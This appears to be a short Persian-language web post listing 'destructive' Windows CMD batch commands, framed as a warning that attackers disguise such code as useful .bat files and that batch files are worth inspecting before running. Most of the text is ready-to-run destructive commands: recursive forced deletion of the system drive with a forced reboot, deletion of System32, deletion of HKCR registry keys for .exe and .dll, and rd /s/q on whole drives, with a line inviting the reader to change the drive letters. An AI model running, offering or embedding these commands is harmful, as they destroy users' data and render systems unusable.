کدهای مخرب محیط CMD ویندوز
کدهای مخرب محیط CMD ویندوز
-> این کدها از مخرب ترین کدهای ویندوزی هستند که ممکن هست نفوذگر آن را به اسم یک فایل مفید در قالب Bat. در اختیار شما بگذارد.
پس بهتر است که قبل از اجرا فایل های با فرمت Bat حتما آن را با یک Editor باز کرده و کدهای آن را آنالیز کنید!
فرمت و یا پاک کردن کل هارد و آسیب رسانی به آن:
off
del %systemdrive%\*.*/f/s/q
shutdown –r –f –t 00"
حذف فایل مهم سیستمی "System32":
c:\WINDOWS\SYSTEM32\*.*/q
حذف تمامی ریجستری ها:
OFF
START reg delete HKCR/.EXE
START reg delete HKCR/.dll
START reg delete HKCR/*
فرمت درایو ها (خودتون میتونید تغییرشون دهید):
D:\
rd/s/q C:\
rd/s/q E:\